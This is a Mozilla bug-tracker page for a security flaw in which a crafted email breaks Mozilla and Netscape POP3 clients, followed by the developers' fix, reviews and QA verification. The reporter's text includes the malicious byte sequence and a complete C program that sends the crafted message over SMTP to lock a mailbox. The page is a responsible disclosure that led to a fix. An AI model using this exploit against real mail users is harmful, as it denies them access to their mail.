Closed Bug 144228 Opened 23 years ago Closed 23 years ago

Malicious email breaks POP server connection


(MailNews Core :: Security, defect)

Not set


(Not tracked)



(Reporter: security-bugs, Assigned: naving)



(Whiteboard: [ADT1 RTM])


(1 file)

Reported by ------------------------------------- Hi, I have found a bug is mozilla, involving the retreiving part of it, it can block the retreiving of the mail box, and the only way is to use telnet to delete the bad mail or, using others mailclient. the blocking effect is due to mishandling of \r\n, for more information use the C code that I have join in the bottom of this mail. I have wrote all the info in this little text, I will not distribute this text until the bug gets fix, and when it will, the code will be corrupt to not let some "script kiddies" plays at DoSing anyone... Apart from this, Mozilla is great! :] //////////////////////////////////////////// ///// Strange Software Behaviour Reports #1 of /// //// discovered, understood and exploited between 05, 08 2001 //// (yes, i took the time... :) ) \/\/\_/-> System affected: All versions of Netscape All versions of Mozilla (even the 2002041711) ^\/\/'\-> System not affected: Outlook Express Outlook 2000 IncrediMail(thks to ben81 for testing) |_/\/\\/> Buggy software team contacted about this: in process... /\/\/\_/> Exploitation: remote & very easy & very anonymous :( _/\/\/\_> Effects: With this remote hole, we can block any mail box that is checked with a pop3 client, so the hotmail, caramail like servers are not affected. A mail will cause the pop3 client to desynchronize with the server, losing the connection to it, and so, leaves all messages on the server (explain later)... In Netscape, we could only see the header of the message, in Mozilla, we could see the begin of the mail message... -/\/\/\/> Explanation: In the SMTP protocol, we can send mail with some introduction command (ehlo,mail,rcpt) and then type our messages and place a dot at a new line to specify to the MTA that it is the end of the message. On the other side, when a POP3 client check mail, it connect to the server, retreive the mail, it terminate the download of a message when it sees a dot at a new line. And here is the trick. If we can place a dot at a new line, and place other words below this dot, the client will beleive the mail is finished and will try to download next messages, thus beiing desynchronize with the server... The POP3 client act as: login on to the POP3 server retrieve mails delete mails logout but if it is desynchronize, it will retreive mail, and disconnect, thus didn't delete mails, and the next time it login, it will refind the same mail, will retreive one more time the mails, disconnect, and other and other... A more detailed explanation, here it is a simple end of a normal mail: blabla... \x0a \x0a and this is the bad mail: blabla... \x0a\x0d\x2e\x0d\x20\x0a\x0a\x0a blabla... \x0a\x20\x00 \x0a We can see at the end of the two 0x0a, it seems that it is just place here by the console...forget it. At this stage, you could catch the bug... Bad implementation of \r\n ? =\/\/\/-> Possible fixes: There are different ways to fix this, - one way is from the client, to stop the bad mail, this is to connect manually via telnet to the pop3 server, and then identify the bad message and do a dele <# of the message> - one better way is to fix this from the client itself, the client can get the size of each messages via the list command, so it should be able to retrieve the complete message, not less, not more... - one way is to fix the MTA so it will not accept such the code below... ~\/\/\/~> Exploit: /* this is the code that comes with my * advisory #1 to illustrate this... * */ #include <stdio.h> #include <strings.h> #include <sys/types.h> #include <sys/socket.h> #include <netdb.h> #include <netinet/in.h> #include <unistd.h> #include <signal.h> #define MX "localhost" #define EHLO "EHLO mx\r\n" #define MAIL "MAIL FROM: root@localhost\r\n" #define RCPT "RCPT TO: root@localhost\r\n" #define DATA "DATA\r\n" #define QUIT "QUIT\r\n" #define PORT 25 int sock; char buffer[255]; void SigCatch() { fprintf(stderr,"\b\bbye!\n"); close(sock); free(buffer); exit(0); } int main() { /* I was too lame to implement the command line... :) */ int i; struct sockaddr_in sout; struct hostent *hp; signal(SIGINT,SigCatch); hp=gethostbyname(MX); sock=socket(AF_INET,SOCK_STREAM,0); if (sock<0) { perror("sock"); return -1; } sout.sin_family=AF_INET; sout.sin_port=htons(PORT); memcpy(&(sout.sin_addr),*(hp->h_addr_list),sizeof(struct in_addr)); if (connect(sock,&sout,sizeof(sout))<0) { perror("connect"); return -1; } recv(sock,buffer,255,MSG_OOB); /* receive the banner... */ fprintf(stderr,buffer); send(sock,EHLO,sizeof(EHLO),MSG_OOB); recv(sock,buffer,255,MSG_OOB); /* receive the welcome message... */ fprintf(stderr,buffer); send(sock,MAIL,sizeof(MAIL),MSG_OOB); recv(sock,buffer,255,MSG_OOB); /* receive the acknowledgement to mail from. */ fprintf(stderr,buffer); send(sock,RCPT,sizeof(RCPT),MSG_OOB); recv(sock,buffer,255,MSG_OOB); /* idem, but for the rcpt to... */ fprintf(stderr,buffer); send(sock,DATA,sizeof(DATA),MSG_OOB); recv(sock,buffer,255,0); fprintf(stderr,buffer); i=sprintf(buffer,"b4d maIl 1n 4KT1oN!\n\x0a\x0d\x2e\x0d\x20\x0a\x0a\nblabla...\x0a\x20"); *(buffer+i)="\x0"; sprintf(buffer+i+1,"\n.\n"); send(sock,buffer,i+1+3,0); /* send the dumb thing ... */ recv(sock,buffer,255,MSG_OOB); fprintf(stderr,buffer); send(sock,QUIT,sizeof(QUIT),MSG_OOB); recv(sock,buffer,255,MSG_OOB); fprintf(stderr,buffer); close(sock); return 0; }
Over to mscott. Scott, can you take a look?
Assignee: mstoltz → mscott
Severity: normal → major
Target Milestone: --- → mozilla1.0.1
Whiteboard: [ADT1 RTM]
reassigning to naving.
Assignee: mscott → naving
*** Bug 144560 has been marked as a duplicate of this bug. ***
Attached patch proposed fixSplinter Review
The fix is to use the message size together with the termination octet to determine when we have completely downloaded a message. Some servers do not return the message size with retr response but we know the message size from 'list' command that is done prior to 'retr' any message.
David, can you review? thx. I'll get mscott to sr.
can you get someone else to review? I'll sr.
Comment on attachment 86510 [details] [diff] [review] proposed fix sr=bienvenu
Attachment #86510 - Flags: superreview+
cavin, can I get r=?, thx.
QA Contact: junruh → esther
Comment on attachment 86510 [details] [diff] [review] proposed fix r=cavin.
Attachment #86510 - Flags: review+
Comment on attachment 86510 [details] [diff] [review] proposed fix a=asa (on behalf of drivers) for checkin to the 1.1 trunk.
Attachment #86510 - Flags: approval+
Once this lands on the trunk, let's get this verified. adding adt1.0.1 nomination
Keywords: adt1.0.1
fixed on trunk
Closed: 23 years ago
Resolution: --- → FIXED
Thanks for the quick fix!
adt1.0.1+ (on ADT's behalf) approval for checkin to the 1.0.1. pls land this on the 1.0 branch, then add the keywrod "fixed1.0.1".
Blocks: 143047
Keywords: adt1.0.1adt1.0.1+
Reopening to ensure the branch fix happens.
Resolution: FIXED → ---
closing this again so that QA can verify on trunk. I have asked approval from drivers for 1.0 branch. We are using keywords for branch fixed and verified.
Closed: 23 years ago23 years ago
Resolution: --- → FIXED
please check into the 1.0.1 branch ASAP. once landed remove the mozilla1.0.1+ keyword and add the fixed1.0.1 keyword
fixed on branch.
Navin, how can I test this. In the duplicate bug you couldn't reproduce this with our POP server and test account, you asked the reporter to send the same message to another POP account using a different server. I did not see that the reporter did that. Do you have a test case (an email that I can edit as new and send) to see the problem? has this message, hopefully. Ask sheela for details. She owns the acct.
I need the message that causes the problem sent to the above mentioned mail account again for me to test the fix. Sent a request to the reporter of the dup bug 6-17-2002
cc'ing sheela since she is the qa owner for the dup'd bug
I notified the owner of the malicious email again asking for it to be sent to our test account. Will wait until 6-24, then try something else.
Using branch build 20020621 on winxp, linux and mac os9.1, branch build 20020618 on Mac OS10.1 and the malicious email sent to our test account by the original reporter this is fixed. Verified. Note, I confirmed I saw the problem using builds dated before the fix. I received and error message when trying to download messages after the malicious message was downloaded. Then with the same profile and a fixed branch build, I was able to get new messages that came in after the malicious message. I will now try this on the latest trunk builds to complete the verification.
Verified on trunk builds: 20020617 winxp, 20020614 linux, 20020613 mac os10.1 and 20020610 mac 9.1 Resolving as verfied now since it was verified on trunk and branch builds.
Group: security?
Product: MailNews → Core
Product: Core → MailNews Core
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